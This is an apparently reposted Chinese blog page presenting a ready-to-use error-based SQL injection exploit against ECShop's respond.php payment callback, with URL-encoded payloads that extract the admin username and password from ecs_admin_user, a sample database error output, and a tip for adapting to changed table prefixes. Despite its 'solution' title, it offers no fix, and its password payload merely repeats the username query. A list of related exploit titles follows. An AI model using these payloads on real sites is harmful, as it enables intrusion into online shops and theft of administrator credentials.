ecshop支付漏洞手工注入 解决方案
来源:互联网 发布:bt下载软件哪个快 编辑:程序博客网 时间:2024/05/18 02:57
原EXP为
==========================================
respond.php?code=tenpay&attach=voucher&sp_billno=1 and(select 1 from(select count(*),concat((select
(select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `ecs`.ecs_admin_user)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and 1=1
==========================================
改进方案 成功得到的返回用户和密码字段的exp
暴用户名:
==========================================
http://site/respond.php?code=tenpay&attach=voucher&sp_billno=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20user_name%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
==========================================
暴密码:
==========================================
http://site/respond.php?code=tenpay&attach=voucher&sp_billno=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20user_name%20FROM%20ecs_admin_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
==========================================
如果表前缀被改如下所示:
==========================================
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT log_id FROM `aimeili`.`aml_pay_log` WHERE order_id=1 and(select 1 from(select count(*),concat((select (select (SELECT password FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 AND order_type=1 ) [2] => Array ( [error] => Table 'aimeili.ecs_admin_user' doesn't exist ) [3] => Array ( [errno] => 1146 ) )
==========================================
只要修改ecs_admin_user为aml_admin_user即可
- ecshop支付漏洞手工注入 解决方案
- Ecshop支付宝插件SQL注入及漏洞利用(exp)
- DedeCMS 支付页面注入漏洞
- ECSHOP全版本注入漏洞分析
- ECSHOP全版本注入漏洞分析
- ecshop SQL注入漏洞导致代码执行
- ecshop SQL注入漏洞 admin/shopinfo.php ecshop SQL注入漏洞
- XSS漏洞与SQL注入漏洞解决方案
- ecshop 2.6.2 版本的sql注入漏洞
- ECSHOP商城系统过滤不严导致SQL注入漏洞
- ecshop SQL注入通杀漏洞以及后台拿SHELL
- webservice XML实体注入漏洞解决方案
- JAVA:URL存在跨站漏洞,注入漏洞解决方案
- JAVA:URL存在跨站漏洞,注入漏洞解决方案
- 手工注入
- 手工注入
- 手工注入
- ecshop 支付宝支付成功后显示”此支付方式不存在或者参数错误!”的解决方案
- poj2240
- 杰奇小说连载系统任意文件上传0day
- 风讯(FoosunCMS) SetNextOptions.asp注入漏洞利用
- poj2240
- VPN隧道攻击
- ecshop支付漏洞手工注入 解决方案
- 程序员的生活
- 个人如何打破部门墙_做事要有霸气
- 2011-07-05|课改是个什么东西?
- SDcms后台拿webshell
- QSetting的用法
- QSettings 与中文
- ora_12560 TNS: protocol adapter error
- DOS 无法找到要执行的指令如(brtools)